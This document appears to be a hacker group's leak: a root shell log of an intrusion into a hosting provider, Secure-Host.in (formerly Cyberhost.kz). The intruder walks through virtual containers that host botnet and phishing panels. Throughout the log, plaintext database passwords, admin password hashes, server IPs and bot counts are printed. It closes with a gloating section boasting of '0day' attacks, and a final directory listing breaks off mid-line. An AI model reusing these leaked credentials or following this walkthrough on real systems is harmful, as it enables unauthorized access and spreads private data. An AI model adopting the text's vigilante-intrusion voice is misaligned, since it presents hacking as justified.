0 0 0.0.0.0:138 0.0.0.0:* 14895/nmbd +udp 0 0 193.107.16.217:53 0.0.0.0:* 21090/named +udp 0 0 127.0.0.1:53 0.0.0.0:* 21090/named +udp 0 0 193.107.16.183:53 0.0.0.0:* 24588/named +udp 0 0 127.0.0.1:53 0.0.0.0:* 24588/named +udp 0 0 193.107.17.69:53 0.0.0.0:* 24903/named +udp 0 0 127.0.0.1:53 0.0.0.0:* 24903/named +udp 0 0 193.107.17.67:53 0.0.0.0:* 25565/named +udp 0 0 127.0.0.1:53 0.0.0.0:* 25565/named +udp 0 0 193.107.17.68:53 0.0.0.0:* 27340/named +udp 0 0 127.0.0.1:53 0.0.0.0:* 27340/named +udp 0 0 193.107.17.81:53 0.0.0.0:* 29195/named +udp 0 0 127.0.0.1:53 0.0.0.0:* 29195/named +udp 0 0 193.107.16.196:53 0.0.0.0:* 30862/named +udp 0 0 127.0.0.1:53 0.0.0.0:* 30862/named +udp 0 0 0.0.0.0:631 0.0.0.0:* 6608/cupsd +udp 0 0 0.0.0.0:979 0.0.0.0:* 6315/rpc.statd +udp 0 0 0.0.0.0:982 0.0.0.0:* 6315/rpc.statd +udp 0 0 0.0.0.0:10000 0.0.0.0:* 22852/perl +udp 0 0 0.0.0.0:10000 0.0.0.0:* 350/perl +udp 0 0 0.0.0.0:53957 0.0.0.0:* 29116/avahi-daemon: +udp 0 0 0.0.0.0:5353 0.0.0.0:* 29116/avahi-daemon: +udp 0 0 :::53 :::* 16961/named +udp 0 0 :::53 :::* 24588/named +udp 0 0 :::5353 :::* 29116/avahi-daemon: +udp 0 0 :::56885 :::* 29116/avahi-daemon: + +# cd /home/ + +# ls +total 104 +drwxr-xr-x 21 root root 4096 Oct 3 08:21 . +drwxr-xr-x 25 root root 4096 Oct 10 05:48 .. +drwx------ 2 bdgatevm bdgatevm 4096 Aug 22 05:35 bdgatevm +drwx------ 2 bnetvm bnetvm 4096 May 21 02:36 bnetvm +drwx------ 2 fredvm fredvm 4096 Sep 5 08:40 fredvm +drwxr-xr-x 2 root root 4096 May 12 01:07 httpd +drwxr-xr-x 7 root root 4096 Aug 22 06:08 hypervm +drwx------ 2 iodasvm iodasvm 4096 Jun 13 03:25 iodasvm +drwx------ 2 ixdevm ixdevm 4096 Sep 9 09:19 ixdevm +drwx------ 2 lxlabs lxlabs 4096 May 12 01:04 lxlabs +drwx------ 2 rootvm rootvm 4096 Aug 15 04:15 rootvm +drwx------ 2 scriptstvm scriptstvm 4096 May 22 02:41 scriptstvm +drwx------ 2 sethvm sethvm 4096 Oct 3 08:21 sethvm +drwx------ 2 spike80vm spike80vm 4096 Sep 7 01:32 spike80vm +drwx------ 2 spikevm spikevm 4096 Jun 7 09:21 spikevm +drwx------ 2 stansecuvm stansecuvm 4096 May 18 03:40 stansecuvm +drwx------ 2 stansocksvm stansocksvm 4096 Aug 15 04:26 stansocksvm +drwx------ 2 truevm truevm 4096 May 16 06:29 truevm +drwx------ 2 wohovm wohovm 4096 Sep 16 03:03 wohovm +drwx------ 2 xtothecvm xtothecvm 4096 Jun 9 08:40 xtothecvm +drwx------ 2 y00vm y00vm 4096 Jun 13 03:02 y00vm + +# du -h +20K ./ixdevm +20K ./scriptstvm +20K ./fredvm +20K ./rootvm +20K ./spikevm +20K ./stansecuvm +20K ./xtothecvm +20K ./iodasvm +20K ./bdgatevm +20K ./y00vm +20K ./stansocksvm +20K ./spike80vm +32K ./lxlabs +20K ./wohovm +8.0K ./httpd +20K ./sethvm +32K ./hypervm/xen/template +40K ./hypervm/xen +1.7M ./hypervm/selfbackup/self/__backup +1.7M ./hypervm/selfbackup/self +1.7M ./hypervm/selfbackup +4.0K ./hypervm/vps/fred.vm/__backup +8.0K ./hypervm/vps/fred.vm +12K ./hypervm/vps +16K ./hypervm/lxguard +8.0K ./hypervm/client/admin +16K ./hypervm/client +1.8M ./hypervm +20K ./bnetvm +20K ./truevm +2.2M . + +# mysql -u snap_db snap_db -pwBqGlNtjZ2m -h bgate.secure-host.in +Reading table information for completion of table and column names +You can turn off this feature to get a quicker startup with -A + +Welcome to the MySQL monitor. Commands end with ; or \g. +Your MySQL connection id is 717502 +Server version: 5.0.92 Source distribution + +Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. + +mysql> SELECT COUNT(*) FROM list_bots; ++----------+ +| COUNT(*) | ++----------+ +| 29818 | ++----------+ +1 row in set (0.00 sec) + +mysql> select * from list_users; ++----+-------+----------------------------------+-------------+-------+-----+ +| id | nick | passwd | permissions | theme | lng | ++----+-------+----------------------------------+-------------+-------+-----+ +| 1 | admin | 76a2173be6393254e72ffa4d6df1030a | 255 | dark | en | +| 2 | test | 598d4c200461b81522a3328565c25f7c | 255 | dark | en | ++----+-------+----------------------------------+-------------+-------+-----+ +2 rows in set (0.00 sec) + +mysql> Ctrl-C -- exit! +Aborted + +# 29818 bots here, not bad...^C +# +# We better check out the other VMs + +# vzlist +Warning: Unknown iptable module: ipt_connlimit, skipped + CTID NPROC STATUS IP_ADDR HOSTNAME + 130 64 running 193.107.16.55 true + 140 60 running 193.107.16.197 stansecu + 160 62 running 193.107.16.81 testing + 180 18 running 193.107.16.184 scriptst + 240 59 running 193.107.17.80 spike + 250 34 running 193.107.17.82 vps287.cyberhost.kz + 260 59 running 193.107.17.83 y00 + 270 38 running 193.107.17.66 iodas + 300 34 running 193.107.16.217 Ro0t.cyberhost.kz + 310 23 running 193.107.16.183 stansocks + 340 56 running 193.107.17.69 badgate.cyberhost.kz + 350 59 running 193.107.17.67 fr3d.cyberhost.kz + 360 61 running 193.107.17.68 vps241.cyberhost.kz + 370 61 running 193.107.17.81 vps249.cyberhost.kz + 380 64 running 193.107.16.196 vps254.cyberhost.kz + 390 10 running 193.107.16.185 vps522.cyberhost.kz + +# vzctl enter 130 +Warning: Unknown iptable module: ipt_connlimit, skipped +entered into CT 130 + +[root@true /]# last +reboot system boot 2.6.18-238.9.1.e Mon Oct 10 13:48 (03:55) +reboot system boot 2.6.18-238.9.1.e Tue Oct 4 10:42 (6+01:17) +root pts/0 77-20-18-64-dyni Tue Oct 4 10:04 - down (00:37) +reboot system boot 2.6.18-238.9.1.e Tue Oct 4 09:54 (00:47) +root pts/0 p5483a590.dip.t- Sat Oct 1 12:50 - 12:55 (00:05) +root pts/0 p5483a590.dip.t- Sat Oct 1 07:48 - 08:31 (00:43) +reboot system boot 2.6.18-238.9.1.e Tue Sep 27 14:19 (5+23:56) +reboot system boot 2.6.18-238.9.1.e Tue Sep 27 14:11 (00:08) +reboot system boot 2.6.18-238.9.1.e Tue Sep 27 14:10 (00:00) +reboot system boot 2.6.18-238.9.1.e Tue Sep 27 09:50 (04:19) +reboot system boot 2.6.18-238.9.1.e Mon Sep 26 15:23 (18:26) +reboot system boot 2.6.18-238.9.1.e Mon Sep 26 15:20 (00:01) +reboot system boot 2.6.18-238.9.1.e Mon Sep 26 15:19 (00:01) +reboot system boot 2.6.18-238.9.1.e Mon Sep 26 15:16 (00:01) +reboot system boot 2.6.18-238.9.1.e Mon Sep 26 15:05 (00:10) +reboot system boot 2.6.18-238.9.1.e Mon Sep 26 14:54 (00:10) +reboot system boot 2.6.18-238.9.1.e Mon Sep 26 14:52 (00:01) +reboot system boot 2.6.18-238.9.1.e Mon Sep 26 14:49 (00:02) +root pts/0 p5483d6ba.dip.t- Fri Sep 23 16:32 - 17:03 (00:31) +root pts/0 p5483d6ba.dip.t- Fri Sep 23 16:21 - 16:32 (00:10) +reboot system boot 2.6.18-238.9.1.e Thu Sep 1 11:18 (25+03:30) +root pts/0 p5483df28.dip.t- Thu Sep 1 10:49 - down (00:29) +reboot system boot 2.6.18-238.9.1.e Thu Sep 1 09:58 (01:19) +reboot system boot 2.6.18-238.9.1.e Thu Sep 1 09:58 (00:00) + +[root@true /]# cd /home/ + +[root@true home]# ls -la +total 60 +drwxr-xr-x 15 root root 4096 Oct 1 12:50 . +drwxr-xr-x 23 root root 4096 Oct 10 13:48 .. +drwx------ 3 admin admin 4096 Sep 1 11:01 admin +drwx------ 2 axfrdns axfrdns 4096 Sep 1 11:10 axfrdns +drwx------ 2 dnscache dnscache 4096 Sep 1 11:10 dnscache +drwx------ 2 dnslog dnslog 4096 Sep 1 11:10 dnslog +drwxr-xr-x 3 root root 4096 Sep 1 11:12 httpd +drwxr-xr-x 3 root root 4096 Oct 1 07:55 irc +drwxr-xr-x 6 root root 4096 Sep 2 04:15 kloxo +drwxr-xr-x 3 root root 4096 Sep 1 11:00 lxadmin +drwx------ 2 lxlabs lxlabs 4096 Sep 1 10:53 lxlabs +drwxr-xr-x 3 root root 4096 Oct 1 12:52 mocks +drwx------ 2 nouser nogroup 4096 Sep 1 10:53 nouser +drwx------ 2 tinydns tinydns 4096 Sep 1 11:10 tinydns +drwxr-x--- 5 true.cyberhost.kz apache 4096 Sep 2 04:04 true.cyberhost.kz + +[root@true true.cyberhost.kz]# cd true.cyberhost.kz/ + +[root@true true.cyberhost.kz]# ls -la +total 36 +drwxr-x--- 5 true.cyberhost.kz apache 4096 Sep 2 04:04 . +drwxr-xr-x 15 root root 4096 Oct 1 12:50 .. +-rw-r--r-- 1 true.cyberhost.kz true.cyberhost.kz 33 Sep 1 11:12 .bash_logout +-rw-r--r-- 1 true.cyberhost.kz true.cyberhost.kz 176 Sep 1 11:12 .bash_profile +-rw-r--r-- 1 true.cyberhost.kz true.cyberhost.kz 124 Sep 1 11:12 .bashrc +drwxr-xr-x 2 true.cyberhost.kz true.cyberhost.kz 4096 Sep 1 11:12 kloxoscript +drwxr-xr-x 2 root root 4096 Oct 5 05:02 __processed_stats +lrwxrwxrwx 1 root root 42 Sep 1 11:12 public_html -> /home/true.cyberhost.kz/true.cyberhost.kz/ +-rw-r--r-- 1 true.cyberhost.kz true.cyberhost.kz 11 Sep 1 11:12 .qmail +drwxr-xr-x 5 true.cyberhost.kz apache 4096 Oct 4 10:31 true.cyberhost.kz + +[root@true true.cyberhost.kz]# cd true.cyberhost.kz/ + +[root@true true.cyberhost.kz]# ls +Design portokalli wordpress +[root@true true.cyberhost.kz]# cd wordpress/ + +[root@true wordpress]# ls +index.php + +[root@true wordpress]# cat index.php +

Visit CyberNetwork

KLICK HIER!!! + +[root@true wordpress]# # nothing to see here + +[root@true true.cyberhost.kz]# logout + +exited from CT 130 + +# vzctl enter 140 +Warning: Unknown iptable module: ipt_connlimit, skipped +entered into CT 140 + +[root@stansecu /]# last +reboot system boot 2.6.18-238.9.1.e Mon Oct 10 13:48 (03:59) +root pts/0 p57b104ec.dip0.t Mon Oct 10 06:09 - 10:15 (04:06) +root pts/1 p57b10668.dip0.t Sun Oct 9 20:17 - 01:20 (05:02) +root pts/0 193.107.17.30 Sun Oct 9 20:05 - 20:30 (00:24) +root pts/0 193.107.17.30 Sun Oct 9 19:49 - 20:05 (00:16) +root pts/0 193.107.17.30 Fri Sep 30 16:00 - 21:16 (05:16) +stanwww pts/0 193.107.17.30 Fri Sep 30 15:59 - 15:59 (00:00) +reboot system boot 2.6.18-238.9.1.e Thu Aug 11 15:15 (59+20:45) +reboot system boot 2.6.18-238.9.1.e Wed Aug 10 09:44 (01:02) +reboot system boot 2.6.18-238.9.1.e Wed Aug 10 09:32 (01:14) +reboot system boot 2.6.18-238.9.1.e Wed Jul 13 17:11 (27+16:18) +root pts/0 193.107.16.213 Sun Jul 10 19:59 - 23:31 (03:32) +root pts/0 92.241.165.69 Fri Jul 1 11:24 - 18:41 (07:16) +root pts/0 92.241.165.69 Thu Jun 30 15:40 - 19:48 (04:07) +root pts/0 92.241.165.69 Tue Jun 28 18:52 - 18:52 (00:00) +root pts/0 92.241.165.69 Wed Jun 22 06:29 - 07:36 (01:07) +root pts/0 92.241.165.69 Mon Jun 20 07:41 - 08:24 (00:43) +root pts/0 92.241.165.69 Tue Jun 14 16:03 - 16:43 (00:39) +root pts/0 92.241.165.69 Mon Jun 13 11:27 - 18:21 (06:54) +root pts/0 92.241.165.69 Sat Jun 11 05:45 - 22:19 (16:33) +root pts/0 92.241.165.69 Mon May 30 12:58 - 13:01 (00:02) +stanwww pts/0 92.241.165.69 Mon May 30 12:58 - 12:58 (00:00) +root pts/0 92.241.165.69 Fri May 27 09:32 - 16:07 (06:34) +root pts/0 92.241.165.69 Sun May 22 20:22 - 20:22 (00:00) +root pts/0 92.241.165.69 Sat May 21 12:08 - 14:10 (02:02) +root pts/0 92.241.165.69 Wed May 18 16:41 - 21:01 (04:20) +reboot system boot 2.6.18-238.9.1.e Wed May 18 16:08 (55+14:20) +root pts/1 92.241.165.69 Wed May 18 15:50 - down (00:17) +root pts/0 77-20-18-64-dyni Wed May 18 12:23 - down (03:45) +reboot system boot 2.6.18-238.9.1.e Wed May 18 11:45 (04:22) + +wtmp begins Wed May 18 11:45:54 2011 + +[root@stansecu /]# cd /home/ +[root@stansecu home]# ls +admin axfrdns dnscache dnslog httpd kloxo lxadmin lxlabs nouser stanwww tinydns + +[root@stansecu home]# cd stanwww/ + +[root@stansecu stanwww]# ls -la +total 44 +drwxr-x--- 7 stanwww apache 4096 Aug 7 17:22 . +drwxr-xr-x 13 root root 4096 May 18 15:00 .. +-rw-r--r-- 1 stanwww stanwww 33 May 18 15:00 .bash_logout +-rw-r--r-- 1 stanwww stanwww 176 May 18 15:00 .bash_profile +-rw-r--r-- 1 stanwww stanwww 124 May 18 15:00 .bashrc +drwxr-xr-x 2 stanwww stanwww 4096 May 18 15:00 kloxoscript +drwxr-xr-x 2 stanwww stanwww 4096 May 21 12:33 pass +drwxr-xr-x 3 stanwww stanwww 4096 Aug 7 17:22 phishingtool +drwxr-xr-x 2 root root 4096 Oct 10 03:57 __processed_stats +lrwxrwxrwx 1 root root 37 May 18 15:00 public_html -> /home/stanwww/stanley.secure-host.in/ +-rw-r--r-- 1 stanwww stanwww 11 May 18 15:00 .qmail +drwxr-xr-x 10 stanwww stanwww 4096 Sep 30 17:08 stanley.secure-host.in + +[root@stansecu stanwww]# cd stanley.secure-host.in + +[root@stansecu stanley.secure-host.in]# ls -la +total 220 +drwxr-xr-x 10 stanwww stanwww 4096 Sep 30 17:08 . +drwxr-x--- 7 stanwww apache 4096 Aug 7 17:22 .. +drwxr-xr-x 2 stanwww stanwww 4096 Jul 10 11:14 bin +drwxr-xr-x 2 stanwww stanwww 4096 May 18 15:00 cgi-bin +drwxr-xr-x 2 stanwww stanwww 4096 Aug 11 2005 images +-rwxr-xr-x 1 stanwww stanwww 1217 May 18 22:32 index.html +drwxr-xr-x 2 stanwww stanwww 4096 Jul 9 18:25 java +drwxr-xr-x 4 stanwww stanwww 4096 May 18 20:18 phishingtool +drwxr-xr-x 6 stanwww stanwww 4096 Jun 6 18:56 snapbn +-rw-r--r-- 1 stanwww stanwww 175104 Jun 13 11:16 sqlite3.dll +drwxr-xr-x 7 stanwww stanwww 4096 Sep 30 16:24 umbralo +drwxr-xr-x 9 stanwww stanwww 4096 May 21 12:32 unique + +[root@stansecu public_html]# cd phishingtool/ + +[root@stansecu phishingtool]# ls -la +total 792 +drwxr-xr-x 4 stanwww stanwww 4096 May 18 20:18 . +drwxr-xr-x 10 stanwww stanwww 4096 Sep 30 17:08 .. +-rw-r--r-- 1 stanwww stanwww 601 Jul 10 11:45 config.php +-rw-r--r-- 1 stanwww stanwww 2121 May 18 20:17 css.css +-rw-r--r-- 1 stanwww stanwww 1973 May 18 20:17 export.php +drwxr-xr-x 2 stanwww stanwww 4096 Jun 12 19:53 exports +-rw-r--r-- 1 stanwww stanwww 750121 May 18 20:17 header.gif +-rw-r--r-- 1 stanwww stanwww 490 May 18 20:17 im.php +-rw-r--r-- 1 stanwww stanwww 1639 May 18 20:17 index.php +-rw-r--r-- 1 stanwww stanwww 2230 May 18 20:17 login.php +-rw-r--r-- 1 stanwww stanwww 111 May 18 20:17 logout.php +-rw-r--r-- 1 stanwww stanwww 1590 May 18 20:17 logs.php +drwxr-xr-x 6 stanwww stanwww 4096 Jul 10 11:48 phishing +-rw-r--r-- 1 stanwww stanwww 889 May 18 20:18 private.php + +tansecu phishingtool]# cat config.php + + +root@stansecu phishingtool]# cd .. +[root@stansecu public_html]# cd snapbn/ + +[root@stansecu snapbn]# ls -la +total 48 +drwxr-xr-x 6 stanwww stanwww 4096 Jun 6 18:56 . +drwxr-xr-x 10 stanwww stanwww 4096 Sep 30 17:08 .. +-rw-r--r-- 1 stanwww stanwww 4217 Jun 6 18:56 adv_state.php +drwxr-xr-x 5 stanwww stanwww 4096 Jun 6 19:05 backend +-rw-r--r-- 1 stanwww stanwww 2237 Jun 6 18:56 control.php +drwxr-xr-x 2 stanwww stanwww 4096 Oct 9 16:26 frontend +-rw-r--r-- 1 stanwww stanwww 3047 Jun 6 18:56 gate.php +-rw-r--r-- 1 stanwww stanwww 931 Jun 6 18:56 grab_zone.php +drwxr-xr-x 2 stanwww stanwww 4096 Jun 6 18:54 images +-rw-r--r-- 1 stanwww stanwww 38 Jun 6 18:56 ip.php +drwxr-xr-x 3 stanwww stanwww 4096 Jun 6 18:56 theme + +[root@stansecu snapbn]# cat backend/settings.inc.php + + +[root@stansecu snapbn]# mysql -u stanwww_snap stanwww_snap -pfYXgyPRB8kv +Reading table information for completion of table and column names +You can turn off this feature to get a quicker startup with -A + +Welcome to the MySQL monitor. Commands end with ; or \g. +Your MySQL connection id is 4094 +Server version: 5.0.92 Source distribution + +Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. + +mysql> SELECT COUNT(*) FROM list_bots; ++----------+ +| count(*) | ++----------+ +| 2553 | ++----------+ +1 row in set (0.01 sec) + +mysql> SELECT * FROM list_users; ++----+----------+----------------------------------+-------------+-------+-----+ +| id | nick | passwd | permissions | theme | lng | ++----+----------+----------------------------------+-------------+-------+-----+ +| 1 | stan | 37a80cc8fffebfa607292c8814d89473 | 255 | dark | en | +| 2 | youmetoo | 033f706d5832000e32c14ba6453ac415 | 255 | dark | en | ++----+----------+----------------------------------+-------------+-------+-----+ +2 rows in set (0.00 sec) + +mysql> 2.5k bots ... well +mysql> Ctrl-C -- exit! +Aborted + +[root@stansecu snapbn]# logout + +exited from CT 140 + +# vzctl enter 160 +Warning: Unknown iptable module: ipt_connlimit, skipped +entered into CT 160 + +[root@testing /]# cd /home/ + +[root@testing home]# ls -la +total 88 +drwxr-xr-x 22 root root 4096 Sep 23 12:07 . +drwxr-xr-x 23 root root 4096 Oct 10 13:49 .. +drwx------ 3 admin admin 4096 May 21 11:17 admin +drwx------ 2 axfrdns axfrdns 4096 May 21 11:28 axfrdns +drwxr-x--- 5 deluxa apache 4096 Jun 15 03:57 deluxa +drwx------ 2 dnscache dnscache 4096 May 21 11:28 dnscache +drwx------ 2 dnslog dnslog 4096 May 21 11:28 dnslog +drwxr-xr-x 12 root root 4096 Sep 23 12:07 httpd +drwxr-xr-x 6 root root 4096 May 22 04:07 kloxo +drwxr-x--- 5 lolboter apache 4096 Aug 10 03:57 lolboter +drwxr-xr-x 3 root root 4096 May 21 11:17 lxadmin +drwx------ 2 lxlabs lxlabs 4096 May 21 11:03 lxlabs +drwxr-x--- 5 lyrex apache 4096 Sep 1 03:57 lyrex +drwxr-x--- 5 master apache 4096 Sep 24 03:58 master +drwx------ 2 nouser nogroup 4096 May 21 11:03 nouser +drwxr-x--- 5 pep apache 4096 Jul 5 03:57 pep +drwxr-x--- 6 pure apache 4096 Jul 5 22:32 pure +drwxr-x--- 5 sprueche apache 4096 Jun 26 03:57 sprueche +drwxr-x--- 5 symb apache 4096 Jun 15 03:57 symb +drwxr-x--- 5 time apache 4096 May 22 03:57 time +drwx------ 2 tinydns tinydns 4096 May 21 11:28 tinydns +drwxr-x--- 5 winfuture apache 4096 May 23 03:57 winfuture + +root@testing home]# cd deluxa/ + +[root@testing deluxa]# ls -la +total 36 +drwxr-x--- 5 deluxa apache 4096 Jun 15 03:57 . +drwxr-xr-x 22 root root 4096 Sep 23 12:07 .. +-rw-r--r-- 1 deluxa deluxa 33 Jun 14 10:46 .bash_logout +-rw-r--r-- 1 deluxa deluxa 176 Jun 14 10:46 .bash_profile +-rw-r--r-- 1 deluxa deluxa 124 Jun 14 10:46 .bashrc +drwxr-xr-x 5 deluxa apache 4096 Jun 14 10:50 deluxa.secure-host.in +drwxr-xr-x 2 deluxa deluxa 4096 Jun 14 10:46 kloxoscript +drwxr-xr-x 2 root root 4096 Jun 15 03:57 __processed_stats +lrwxrwxrwx 1 root root 35 Jun 14 10:46 public_html -> /home/deluxa/deluxa.secure-host.in/ +-rw-r--r-- 1 deluxa deluxa 11 Jun 14 10:46 .qmail + +[root@testing deluxa]# cd public_html/ + +[root@testing public_html]# ls +cgi-bin images index.html snapbn + +[root@testing public_html]# cat snapbn/ +adv_state.php backend/ control.php frontend/ gate.php grab_zone.php images/ ip.php theme/ + +[root@testing public_html]# cat snapbn/backend/ +classes/ flags/ GeoIP.dat geoip.inc index.php js.js language/ settings.inc.php settings.inc.php_ system.php + +[root@testing public_html]# cat snapbn/backend/settings.inc.php + + +[root@testing public_html]# mysql -u deluxa_snap deluxa_snap -p2ynPMKCST92 +Reading table information for completion of table and column names +You can turn off this feature to get a quicker startup with -A + +Welcome to the MySQL monitor. Commands end with ; or \g. +Your MySQL connection id is 602007 +Server version: 5.0.92 Source distribution + +Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. + +mysql> SELECT * FROM list_users; ++----+--------+----------------------------------+-------------+-------+-----+ +| id | nick | passwd | permissions | theme | lng | ++----+--------+----------------------------------+-------------+-------+-----+ +| 1 | deluxa | 5f4dcc3b5aa765d61d8327deb882cf99 | 255 | dark | en | ++----+--------+----------------------------------+-------------+-------+-----+ +1 row in set (0.00 sec) + +mysql> SELECT COUNT(*) FROM list_bots; ++----------+ +| COUNT(*) | ++----------+ +| 45 | ++----------+ +1 row in set (0.00 sec) + +mysql> Ctrl-C -- exit! +Aborted + +[root@testing lolboter]# cd /home/lolboter/public_html/ + +[root@testing public_html]# ls -la +total 28 +drwxrwxrwx 6 lolboter apache 4096 Oct 18 16:50 . +drwxr-x--- 5 lolboter apache 4096 Aug 10 03:57 .. +drwxrwxrwx 2 lolboter lolboter 4096 Aug 9 11:45 cgi-bin +drwxrwxrwx 2 lolboter lolboter 4096 Aug 11 2005 images +-rwxrwxrwx 1 lolboter lolboter 1213 Aug 9 11:45 index.html +drwxr-xr-x 3 lolboter lolboter 4096 Aug 9 13:06 snapbn +drwxrwxrwx 6 lolboter lolboter 4096 Aug 9 12:55 upload + +[root@testing public_html]# cat snapbn/backend/settings.inc.php + SELECT * FROM list_users; ++----+-------+----------------------------------+-------------+-------+-----+ +| id | nick | passwd | permissions | theme | lng | ++----+-------+----------------------------------+-------------+-------+-----+ +| 1 | admin | e6053eb8d35e02ae40beeeacef203c1a | 255 | dark | en | ++----+-------+----------------------------------+-------------+-------+-----+ +1 row in set (0.00 sec) + +mysql> SELECT COUNT(*) FROM list_bots; ++----------+ +| COUNT(*) | ++----------+ +| 349 | ++----------+ +1 row in set (0.00 sec) + +mysql> Ctrl-C -- exit! +Aborted + +[root@testing public_html]# mysql -u lyrex_snap lyrex_snap -pIxBEyUkcjRy + +mysql> SELECT * FROM list_users; ++----+-------+----------------------------------+-------------+-------+-----+ +| id | nick | passwd | permissions | theme | lng | ++----+-------+----------------------------------+-------------+-------+-----+ +| 1 | lyrex | d43a389b900aff13aa56477e7f3618df | 255 | dark | en | ++----+-------+----------------------------------+-------------+-------+-----+ +1 row in set (0.00 sec) + +mysql> SELECT COUNT(*) FROM list_bots; ++----------+ +| COUNT(*) | ++----------+ +| 658 | ++----------+ +1 row in set (0.01 sec) + +mysql> Ctrl-C -- exit! +Aborted + +[root@testing home]# logout +exited from CT 160 + +# vzctl enter 240 +Warning: Unknown iptable module: ipt_connlimit, skipped +entered into CT 240 + +[root@spike /]# cd /home + +[root@spike home]# ls -la +total 52 +drwxr-xr-x 13 root root 4096 Jun 7 18:11 . +drwxr-xr-x 23 root root 4096 Oct 10 13:49 .. +drwx------ 3 admin admin 4096 May 22 13:38 admin +drwx------ 2 axfrdns axfrdns 4096 May 22 13:51 axfrdns +drwxr-x--- 5 bnet apache 4096 Jun 8 03:57 bnet +drwx------ 2 dnscache dnscache 4096 May 22 13:51 dnscache +drwx------ 2 dnslog dnslog 4096 May 22 13:51 dnslog +drwxr-xr-x 3 root root 4096 Jun 7 18:11 httpd +drwxr-xr-x 6 root root 4096 Jun 8 04:07 kloxo +drwxr-xr-x 3 root root 4096 May 22 13:37 lxadmin +drwx------ 2 lxlabs lxlabs 4096 May 22 13:23 lxlabs +drwx------ 2 nouser nogroup 4096 May 22 13:23 nouser +drwx------ 2 tinydns tinydns 4096 May 22 13:51 tinydns + +[root@spike home]# cd httpd + +[root@spike httpd]# ls -la +total 16 +drwxr-xr-x 3 root root 4096 Jun 7 18:11 . +drwxr-xr-x 13 root root 4096 Jun 7 18:11 .. +-rwxr-xr-x 1 root root 111 May 22 13:51 nobody.sh +drwxrwxr-x 6 bnet apache 4096 Jun 7 18:11 spike.secure-host.in + +[root@spike httpd]# cd .. + +[root@spike home]# cd bnet + +[root@spike bnet]# ls -la +total 36 +drwxr-x--- 5 bnet apache 4096 Jun 8 03:57 . +drwxr-xr-x 13 root root 4096 Jun 7 18:11 .. +-rw-r--r-- 1 bnet bnet 33 Jun 7 18:11 .bash_logout +-rw-r--r-- 1 bnet bnet 176 Jun 7 18:11 .bash_profile +-rw-r--r-- 1 bnet bnet 124 Jun 7 18:11 .bashrc +drwxr-xr-x 2 bnet bnet 4096 Jun 7 18:11 kloxoscript +drwxr-xr-x 2 root root 4096 Sep 11 03:57 __processed_stats +lrwxrwxrwx 1 root root 32 Jun 7 18:11 public_html -> /home/bnet/spike.secure-host.in/ +-rw-r--r-- 1 bnet bnet 11 Jun 7 18:11 .qmail +drwxr-xr-x 5 bnet apache 4096 Jun 7 18:25 spike.secure-host.in + +[root@spike bnet]# cd public_html + +[root@spike public_html]# ls -la +total 24 +drwxr-xr-x 5 bnet apache 4096 Jun 7 18:25 . +drwxr-x--- 5 bnet apache 4096 Jun 8 03:57 .. +drwxr-xr-x 2 bnet bnet 4096 Jun 7 18:11 cgi-bin +drwxr-xr-x 2 bnet bnet 4096 Aug 11 2005 images +-rwxr-xr-x 1 bnet bnet 1213 Jun 7 18:11 index.html +drwxr-xr-x 6 bnet bnet 4096 Jun 7 19:04 snapbn + +[root@spike public_html]# cat snapbn/backend/settings.inc.php + + +[root@spike public_html]# mysql -u bnet_snap bnet_snap -plBseTPTE7av +Reading table information for completion of table and column names +You can turn off this feature to get a quicker startup with -A + +Welcome to the MySQL monitor. Commands end with ; or \g. +Your MySQL connection id is 10731 +Server version: 5.0.92 Source distribution + +Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. + +mysql> SELECT * FROM list_users; ++----+-------+----------------------------------+-------------+-------+-----+ +| id | nick | passwd | permissions | theme | lng | ++----+-------+----------------------------------+-------------+-------+-----+ +| 1 | admin | e48e13207341b6bffb7fb1622282247b | 255 | dark | en | ++----+-------+----------------------------------+-------------+-------+-----+ +1 row in set (0.00 sec) + +mysql> SELECT COUNT(*) FROM list_bots; ++----------+ +| COUNT(*) | ++----------+ +| 1321 | ++----------+ +1 row in set (0.01 sec) + +mysql> Ctrl-C -- exit! +Aborted + +[root@spike public_html]# logout +exited from CT 240 + +... + +We could actually post content of the other VMs but, believe us, it's +always the same sort of bullshit. Bot and stealer panels everywhere, +so this would just be a waste of your time ... + + ,;~;, + /\_ + ( / + (() //) + | \\ ,,;;'\ + __ _( )m=((((((((((((((======={ Secure-Host.in }======------- + /' ' '()/~' '.(, | + ,;( )|| | ~ As we already pointed out, we concluded that it +,;' \ /-(.;, ) would be best to crush every single project of + ) / ) / k!LLu with our iron fist of 0day madness. One of + // || the excrements he produces is Secure-Host.in + )_\ )_\ formerly known as Cyberhost.kz where he basically +offers "secure" hosting. Well by now it should be clear that if +somebody like k!LLu talks about "security", he actually has no clue +about that kind of topic. The fact is that he cannot secure his +systems because he really does not know how. We're confident that the +chapter 'k!LLu' can be closed once and for all now, maybe someone even +drew a lesson from it. + +# pwd +/home/hosting + +# ls -la +total 48 +drwxr-x--- 6 hosting www 512 May 16 14:06 . +drwxr-x--x 13 root wheel 512 Sep 22 21:06 .. +drwxrwx--- 17 hosting www 1536 May 16 14:50 cp.secure-host.in +drwxr-xr-x 2 root www 1024 May 16 14:09 ioncube +drwxrwx--- 5 hosting www 512 Aug 19 04:51 secure-host.in +drwxrwx--- 2 hosting www 13312 Oct 16 10:48 temp + +# cd secure-host.in/ + +# ls -laR +total 24 +drwxrwx--- 5 hosting www 512 Aug 19 04:51 . +drwxr-x--- 6 hosting www 512 May 16 14:06 .. +drwxr-xr-x 2 root www 512 May 16 20:57 fileup +drwxr-xr-x 2 root www 512 May 20 10:12 imgupload +-rw-r--r-- 1 hosting www 1680 Aug 19 04:52 index.html +drwxr-xr-x 2 root www 512 May 18 21:56 static + +./fileup: +total 912 +drwxr-xr-x 2 root www 512 May 16 20:57 . +drwxrwx--- 5 hosting www 512 Aug 19 04:51 .. +-rw-r--r-- 1 root www 324608 May 16 20:58 Snap_SmilingBandit.exe +-rw-r--r-- 1 root www 118784 May 16 20:53 smile.exe + +./imgupload: +total 4232 +drwxr-xr-x 2 root www 512 May 20 10:12 . +drwxrwx--- 5 hosting www 512 Aug 19 04:51 .. +-rw-r--r-- 1 root www 2130942 May 20 10:11 samsung.jpg + +./static: +total 120 +drwxr-xr-x 2 root www 512 May 18 21:56 . +drwxrwx--- 5 hosting www 512 Aug 19 04:51 .. +-rw-r--r-- 1 root www 57198 May 18 22:08 sechost.png + +# cd .. + +# cd cp.secure-host.in + +# ls -la +total 1296 +drwxrwx--- 17 hosting www 1536 May 16 